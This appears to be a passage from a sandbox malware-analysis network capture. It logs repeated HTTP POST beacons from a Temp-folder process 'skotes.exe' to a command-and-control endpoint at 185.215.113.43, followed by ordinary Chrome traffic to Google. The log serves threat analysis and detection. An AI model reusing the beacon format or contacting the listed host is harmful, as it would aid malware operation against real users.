Nov 10, 2024 05:00:04.369784117 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 04:00:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.5	50361	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 05:00:06.006978989 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 05:00:06.915334940 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 04:00:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.5	50362	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 05:00:08.439229012 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 05:00:09.345638037 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 04:00:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.5	50363	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 05:00:10.969407082 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 05:00:11.902096987 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 04:00:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.5	50364	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 05:00:13.423016071 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 05:00:14.336519957 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 04:00:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.5	50365	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 05:00:15.963279963 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 05:00:16.860544920 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 04:00:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.5	50366	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 05:00:18.383085966 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 05:00:19.279572010 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 04:00:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.5	50367	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 05:00:20.895159960 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 05:00:21.795794964 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 04:00:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.5	50368	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 05:00:23.315576077 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 05:00:24.218308926 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 04:00:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.5	50369	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 05:00:25.846056938 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 05:00:26.757993937 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 04:00:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.5	50370	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 05:00:28.283591032 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 05:00:29.212973118 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 04:00:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.5	50371	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 05:00:30.845155001 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 05:00:31.774215937 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 04:00:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.5	50372	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 05:00:33.288111925 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 05:00:34.215451956 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 04:00:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	142.250.185.68	443	7276	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:05 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-10 03:55:05 UTC	1266	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:05 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-qMfHBqim-VJzPGZ2jaO5hg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-10 03:55:05 UTC	112	IN	Data Raw: 38 34 66 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 61 6d 62 61 73 73 61 64 6f 72 20 62 72 69 64 67 65 20 63 61 6e 61 64 61 22 2c 22 74 61 72 67 65 74 20 68 6f 6c 69 64 61 79 20 62 65 61 72 73 20 67 69 76 65 61 77 61 79 22 2c 22 64 65 6e 76 65 72 20 62 72 6f 6e 63 6f 73 20 76 73 20 6b 61 6e 73 61 73 20 63 69 74 79 20 63 68 69 65 66 73 22 Data Ascii: 84f)]}'["",["ambassador bridge canada","target holiday bears giveaway","denver broncos vs kansas city chiefs"
2024-11-10 03:55:05 UTC	1378	IN	Data Raw: 2c 22 64 65 6e 76 65 72 20 61 69 72 70 6f 72 74 20 66 6c 69 67 68 74 73 20 64 65 6c 61 79 65 64 22 2c 22 6e 6f 72 74 68 65 72 6e 20 6c 69 67 68 74 73 20 61 75 72 6f 72 61 20 66 6f 72 65 63 61 73 74 22 2c 22 64 72 61 67 6f 6e 20 61 67 65 20 76 65 69 6c 67 75 61 72 64 22 2c 22 61 6c 64 69 20 63 68 65 65 73 65 20 72 65 63 61 6c 6c 65 64 22 2c 22 63 61 72 6f 6c 69 6e 61 20 68 75 72 72 69 63 61 6e 65 73 20 70 72 65 64 69 63 74 69 6f 6e 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 Data Ascii: ,"denver airport flights delayed","northern lights aurora forecast","dragon age veilguard","aldi cheese recalled","carolina hurricanes prediction"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEw
2024-11-10 03:55:05 UTC	644	IN	Data Raw: 30 4d 30 55 72 4e 30 38 7a 61 33 4a 75 64 69 39 47 54 30 52 74 62 79 39 68 63 58 70 53 63 58 64 74 52 56 49 79 64 79 74 42 56 6a 5a 36 4e 55 46 4b 4e 45 39 45 4c 31 5a 54 64 48 49 35 63 45 77 31 62 32 31 72 4d 47 35 57 61 46 6c 58 5a 45 46 54 54 56 6f 33 5a 44 5a 70 53 6e 4a 70 54 6e 42 71 51 6d 4a 53 5a 30 56 6f 61 44 42 46 57 6d 4a 35 5a 6a 6c 79 57 6a 4a 79 55 31 4e 52 63 54 42 35 51 6b 67 34 61 6a 56 56 65 54 46 4b 4e 46 64 68 61 54 5a 73 53 31 5a 70 62 31 56 77 55 32 64 56 63 46 4e 6e 56 58 42 54 5a 79 38 76 57 6a 6f 5a 52 48 4a 68 5a 32 39 75 49 45 46 6e 5a 54 6f 67 56 47 68 6c 49 46 5a 6c 61 57 78 6e 64 57 46 79 5a 45 6f 48 49 7a 67 79 4e 44 46 68 4d 31 4a 47 5a 33 4e 66 63 33 4e 77 50 57 56 4b 65 6d 6f 30 64 46 5a 51 4d 58 70 6a 4d 45 78 44 65 6b Data Ascii: 0M0UrN08za3Judi9GT0Rtby9hcXpScXdtRVIydytBVjZ6NUFKNE9EL1ZTdHI5cEw1b21rMG5WaFlXZEFTTVo3ZDZpSnJpTnBqQmJSZ0VoaDBFWmJ5ZjlyWjJyU1NRcTB5Qkg4ajVVeTFKNFdhaTZsS1Zpb1VwU2dVcFNnVXBTZy8vWjoZRHJhZ29uIEFnZTogVGhlIFZlaWxndWFyZEoHIzgyNDFhM1JGZ3Nfc3NwPWVKemo0dFZQMXpjMExDek
2024-11-10 03:55:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	142.250.185.68	443	7276	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:05 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49710	142.250.185.68	443	7276	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:05 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-10 03:55:05 UTC	1042	IN	HTTP/1.1 200 OK Version: 693618659 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 10 Nov 2024 03:55:05 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-10 03:55:05 UTC	336	IN	Data Raw: 33 64 35 61 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 3d5a)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-11-10 03:55:05 UTC	1378	IN	Data Raw: 20 67 62 5f 6f 64 20 67 62 5f 46 64 20 67 62 5f 6c 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 Data Ascii: gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u00
2024-11-10 03:55:05 UTC	1378	IN	Data Raw: 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c Data Ascii: 03c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\
